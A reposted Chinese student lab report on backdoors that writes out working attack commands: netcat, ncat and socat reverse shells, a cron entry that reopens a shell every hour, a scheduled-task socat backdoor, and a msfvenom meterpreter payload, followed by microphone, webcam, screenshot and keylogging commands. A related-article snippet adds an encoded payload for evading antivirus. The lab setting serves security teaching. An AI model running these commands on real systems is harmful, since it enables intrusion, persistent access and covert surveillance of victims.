2018-2019-2 网络对抗技术 20165320 Exp2 后门原理与实践

最新推荐文章于 2024-09-25 15:20:18 发布
最新推荐文章于 2024-09-25 15:20:18 发布
阅读量113 收藏
点赞数
文章标签: 操作系统 shell 运维
原文链接:http://www.cnblogs.com/Gst-Paul/p/10581297.html
版权

后门原理与实践

windows获取Linux操作Shell

  • 获取本机的IP
    1296864-20190322214811038-1655378963.png

  • netcat介绍:一个进行基本的TCP、UDP数据收发的工具

  • 相关的参数与具体用法
    1296864-20190322214825285-99775100.png

  • windows打开监听: ncat.exe -l -p 5320(学号)

  • Linux反弹连接windows nc IP 5320(学号) -e /bin/sh

  • windows命令行内输入ls,查看实验结果如下:
    1296864-20190322214849329-589766484.png

Linux获取Windows操作shell

  • Linux运行监听:nc -l -p 5320

  • Windows反连接Linux: ncat.exe -e cmd.exe ip_of_linux 5320

  • Linux下能够看到windows命令行的提示符,实验结果如下:
    1296864-20190322215010293-85176046.png

使用ncat进行数据的传输

  • Linux运行监听

  • Windows反连接Linux

  • Linux命令行中输入数据,Windows能收到:
    1296864-20190322215024747-2103766099.png

使用ncat进行文件传输

  • windows运行监听 ncat.exe -l 5320 > 20165320.txt

  • Linux反连接windows nc 192.168.1.143 5320 < 20165320.txt

  • 查看运行结果如下:
    1296864-20190322215033287-1481084608.png

  • 过程中遇到的问题:我尝试过用Linux运行监听,windows反连接Linux,但是一直提示“由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败”,尝试过关闭防火墙,但是依旧没有用,目前还没找到问题所在。

使用netcat获取主机操作的Shell,cron启动

  • 在win10系统下启动监听:ncat.exe -l 5320

  • 在Kali中使用crontab指令编辑一条任务,在任务的最后一行添加这样一行:每小时多少分钟进行一次反连接 + * * * * /bin/netcat 监听的主机的IP 5320 -e /bin/sh
    1296864-20190322215543684-1731775892.png

  • 等到时间在win10命令行中输入相关命令查看实验结果:
    1296864-20190322215219406-1589593403.png

使用socat获取主机操作Shell,任务计划启动

  • socat相关介绍:查找学姐的博客的相关内容能了解到socat是ncat的增强版,能够建立两个双向的字节流传输数据,具体格式为 socat + 选项 + 地址 + 地址

  • 在win10系统进入计算机管理界面

  • 创建一个任务并添加一个触发器,在操作选项中添加socat的文件路径,并在添加参数输入框中输入:tcp-listen:5320 exec:cmd.exe,pty,stderr (命令前面能看懂是将cmd.exe与端口号绑定,后面那一串只知道stderr是标准错误输出设备,stdout是标准输入设备)
    1296864-20190322215557583-563367710.png
    1296864-20190322215634593-1722841419.png

  • 锁屏后重新登陆查看到改任务已经运行成功
    1296864-20190322215608643-346827179.png

  • 在Kali虚拟机的命令行中输入如下指令:socat - tcp:192.168.1.143:5320,实验结果如下:
    1296864-20190322215716501-1946175726.png

使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 在Kali上输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击主机IP LPORT=5320 -f exe > 20165320_backdoor.exe生成一个后门程序,其中LHOST与LPORT应该是后门程序在被攻击主机中运行时,反连接所需要的地址与端口号。
    1296864-20190322215730706-1296797561.png

  • 然后通过nc与ncat.exe将后门程序传送到被攻击主机

  • 在Kali虚拟机使用msfconsole指令进入控制台,使用监听模块设置payload,设置反弹回连的IP和端口,设置完成后执行监听。
    1296864-20190322215825205-2118947647.png

  • windows运行后门程序,此时Kali能获得windows的远程Shell,结果如下:
    1296864-20190322215751167-915985987.png
    1296864-20190322215835566-834531089.png

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容

  • 使用getuid指令获取用户名
    1296864-20190322215946440-2052290349.png

  • 使用record_mic指令截获一段音频
    1296864-20190322225832803-137157052.png

  • 使用webcam获取摄像头的权限进行拍照:
    1296864-20190322215858270-1840957734.png

  • 使用screenshot进行截屏
    1296864-20190322215908393-88957217.png

  • 使用keyscan_start指令记录击键过程,使用keyscan_dump获取相关记录
    1296864-20190322215917648-786777123.png

  • 例举你能想到的一个后门进入到你系统中的可能方式

    答:一个很明显的方式就是很多同学在某些游戏网站上下载盗版游戏时会有很多捆绑软件,这些软件毫无疑问是一些后门程序

  • 例举你知道的后门如何启动起来(win及linux)的方式?

    答:钓鱼,诱使用户点击一些不明链接,打开一些不明文件,图片

  • Meterpreter有哪些给你映像深刻的功能?

    答:能生成一些后门程序,这个比较方便

  • 如何发现自己有系统有没有被安装后门?

    答:好像能通过查看系统进程与一些自启动项,装杀毒软件来进行防护

实验体会

  • 这一次实验能让自己有一种真正接触到网络攻防的感觉,但是仔细想了一下,做的还是一些特别简单的东西,现实生活中很难使用这样的手段达到攻击的目标,所以还需要努力学习专业知识,争取能学到一些比较厉害的技术。

转载于:https://www.cnblogs.com/Gst-Paul/p/10581297.html

weixin_34194379
关注
详尽的msf——meterpreter——渗透测试教程
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
MSF生成meterpreter及静态免杀
渗透笔记
01-26 5540
1.静态免杀 1.1编译c文件,静态免杀 1.1.1 生成shellcode 在kali命令行输入 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '/x00' lhost=192.168.1.160 lport=7777 -f c -o /home/shell/test01.c -
#20155235 《网络攻防》 实验二 后门原理实践
weixin_30236595的博客
04-03 278
20155235 《网络攻防》 实验二 后门原理实践 实验目的 建立一个后门连接是如此的简单,功能又如此强大。通过亲手实践并了解这一事实,从而提高自己的安全意识 。 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或soca...
2018-2019-2 20165234 《网络对抗技术Exp2 后门原理实践
a5251703897的博客
03-24 205
实验二后门原理实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录...
MSF之Msfvenom+Meterpreter
SoulCat
08-12 4114
MSF之Msfvenom+Meterpreter 太极生两仪,两仪生四象, 四象生八卦,八卦衍万物。 然后呢? 万物不如你! Msfvenom: msfvenom是msfpayload,msfencode的结合体,它的优点是单一命令行和效率.利用msfvenom生成各种版本木马程序,并在目标机上执行,在本地监听上线,执行攻击。 Options: -p, --payload 指定需要使用的payl...
2018-2019-2 网络对抗技术 20165320 Exp3 免杀原理实践
weixin_30644369的博客
03-31 147
### 2018-2019-2 网络对抗技术 20165320 Exp3 免杀原理实践 一、实验内容 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分) 1.2 通过组合应用各种技术实现恶意代码免杀(0.5分) 1.3 用另一电脑实测,在杀软开启的情...
网络对抗技术-Exp2-后门原理实践 20181314
weixin_46014245的博客
03-15 417
一、实验内容 1.使用netcat获取主机操作Shell,cron启动 Windows获得Linux Shell 在Windows下使用ipconfig查看本机IP win+r 输入cmd,打开监听 nc -l -p 1314 在kali中反弹连接Windows,nc 172.16.214.132 -e /bin/sh,使用-e选项执行shell程序 Windows成功获得kali的shell,利用ls,whoami指令查看相关信息 Linux获得Windows Shell 在kali中使用ifconfi
20204323太晓梅 网络对抗技术 exp2 后门原理实践
m0_57567318的博客
03-24 203
但是我在前期仍然是遇到了很多问题,以前我总是会下意识的向别人求助,但是在本次实验中由于我碰到的问题我周围的人都没有遇到类似的,我想到老师视频中也是遇到了很多困难,但是都是通过自己的各种猜想去判断检查,上网查看解决方法,老师上课时也举例子讲了一些简单的排查流程。但由于前期耗费了大量的时间,后面在对于meterpreter的使用理解的不是很到位,只是参考别人的实验代码理解和使用命令行进行操作,对其内部的机理了解不深,本来想尝试做一下加分项的,但是最后放弃了,在这点上我还需要提高。后门便是其中的一种。
网络对抗技术-Exp4-恶意代码分析 20181314
weixin_46014245的博客
04-07 512
一、原理实践说明 1.实践目标 2.实践内容概述 3.基础问题回答 二、实践过程记录 任务一:使用schtasks指令监控系统 任务二:使用sysmon工具监控系统 任务三:恶意软件分析 使用VirusTotal分析恶意软件 使用PEiD分析恶意软件 使用PE Explorer分析恶意软件 使用Process Monitor分析恶意软件 使用Process Explorer分析恶意软件 使用systracer分析恶意软件 使用Wireshark分析恶意软件 三、实验遇到的问题及解决方法 四、实验总结与体会
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 395
一、原理实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 二、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务二:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
20221902 2022-2023-2 《网络攻防实践》第六次作业
xiannvyeye的博客
04-15 381
MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。防火墙最佳做法和标准的默认防火墙配置,有助于保护网络资源免受从企业外部发起的攻击,默认情况下能建立空连接。
渗透之——MSF—Meterpreter清理日志
冰河的专栏
01-07 6053
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86008037 在我们用MSF成功对目标进行了渗透之后,不要忘记要清理渗透过程中留下的日志,下面就如何清理日志和大家分享下。 步骤如下: 删除之前添加的账号 删除所有在渗透过程中使用的工具 删除应用程序、系统和安全日志 关闭所有的Meterpreter连接 1.删除之前...
20165101刘天野 2018-2019-2《网络对抗技术Exp2 后门原理实践
weixin_30846599的博客
03-24 188
目录 20165101刘天野 2018-2019-2《网络对抗技术Exp2 后门原理实践 1. 实验内容 1.1 使用netcat获取主机操作Shell,cron启动 1.2 使用socat获取主机操作Shell, 任务计划启动 1.3 使用MSF meterpreter生成可...
MSF:Meterpreter简介、基本命令
prettyX的博客
12-30 2915
内容 Meterpreter简介 Meterpreter优点 Meterpreter基本命令 Meterpreter简介 Meterpreter是MSF中的一个杀手锏,通常作为漏洞溢出后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给我们一个控制通道 Meterpreter是MSF的一个扩展模块,可以调用MSF的一些功能,对目标系统进行更为深入的渗透,这些功能包括反追踪、纯内存工作模式、...
Linux三剑客(grep、sed、awk)【三、awk】
qq_44799103的博客
09-23 703
awk 必须 外层单引号,内层双引号内置变量 $1 $2 都不得加双引号,否则会识别为文本,尽量别加引号awk '{print "第一列:" $1, "第二列:" $2}' tmp.txt",name}'laomao#间接引用shell变量。
深入理解Linux进程机制
TravisBytes的博客
09-25 993
进程是 Linux 操作系统中管理和调度程序执行的核心概念。理解进程的生命周期、状态、创建与控制机制,以及进程间通信方式,对于系统开发、性能优化和故障排除具有重要意义。通过熟练掌握相关命令和工具,可以有效地管理和监控系统中的进程,确保系统的稳定和高效运行。
【Linux实践】实验四:Shell实用功能及文件权限
最新发布
Fulling的博客
09-25 711
实验内容 1、使用命令“cat /etc/named.conf”设置为别名named,然后再取消别名。 2、使用echo命令和输出重定向创建文本文件/root/nn,内容是hello,然后再使用追加重定向输入内容为word。 3、使用管道方式分页显示/etc/passwd的内容。 4、分别用文字设定法和数字设定法,对/root/ab文件设置权限,所有者为读取、写入和执行权限,同组用户为读取和写入权限,其他用户没有任何权限。 5、将文件/root/ab所有者更改为用户zhangsan。 6、将目录/root/
Linux入门学习:进程概念
Lvision2的博客
09-24 1061
在课本的概念中,进程程序的一个执行实例,正在执行的程序。其内核观点:担当分配系统资源(CPU时间,内存)的实体。但这些概念太笼统,并不能让我们更加清晰的知道进程是什么,实际上,进程是内核数据结构(pcb) + 程序的代码与数据。pcb(process control block)进程控制块,进程信息被放在一个叫pcb的数据结构中,可以理解为进程属性的集合。在Linux入门学习:深刻理解计算机硬件与OS体系中,我们已经了解到。
MSP-EXP430G2串行通信入门与开发板简介
本文档主要介绍了如何在MSP-EXP430G2开发板上利用串行通信功能进行系统调试和数据交换。MSP-EXP430G2是一款低成本的开发板,专为TI公司的MSP430G2xx系列设计,它提供了全面的开发解决方案,包括USB集成仿真器、DIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值